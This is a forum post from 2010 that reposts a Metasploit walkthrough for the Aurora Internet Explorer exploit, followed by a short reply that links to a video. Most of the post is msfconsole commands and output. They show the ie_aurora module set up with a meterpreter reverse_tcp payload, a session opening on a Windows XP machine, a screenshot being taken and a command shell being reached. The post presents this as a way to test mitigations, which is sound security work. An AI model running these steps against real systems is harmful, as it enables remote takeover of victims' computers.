pyth0n3 Posted January 17, 2010

Friday, January 15, 2010

Update: DEP blocks this sample and the Metasploit module; DEP is enabled by default in IE 8.

Yesterday, a copy of the unpatched Internet Explorer exploit used in the Aurora attacks was uploaded to Wepawet. Since the code is now public, we ported this to a Metasploit module in order to provide a safe way to test your workarounds and mitigation efforts.

To get started, grab the latest copy of the Metasploit Framework and use the online update feature to sync latest exploits from the development tree. Start the Metasploit Console (msfconsole) and enter the commands in bold:

msf > use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST (your IP)
msf exploit(ie_aurora) > set URIPATH /
msf exploit(ie_aurora) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on port 4444
[*] Local IP: http://192.168.0.151:8080/
[*] Server started.
msf exploit(ie_aurora) >

Open Internet Explorer on a vulnerable machine (we tested Windows XP SP3 with IE 6) and enter the Local IP URL into the browser. If the exploit succeeds, you should see a new session in the Metasploit Console:

[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.166:1514)
msf exploit(ie_aurora) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: WINXP\Developer
meterpreter > use espia
Loading extension espia...success.
meterpreter > screenshot aurora.bmp
meterpreter > shell
Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Developer\Desktop>

metasploit.com

Guest Kabron Posted January 17, 2010

Aha, more details below, plus a video of this in action.

Praetorian Prefect | The “Aurora” IE Exploit Used Against Google in Action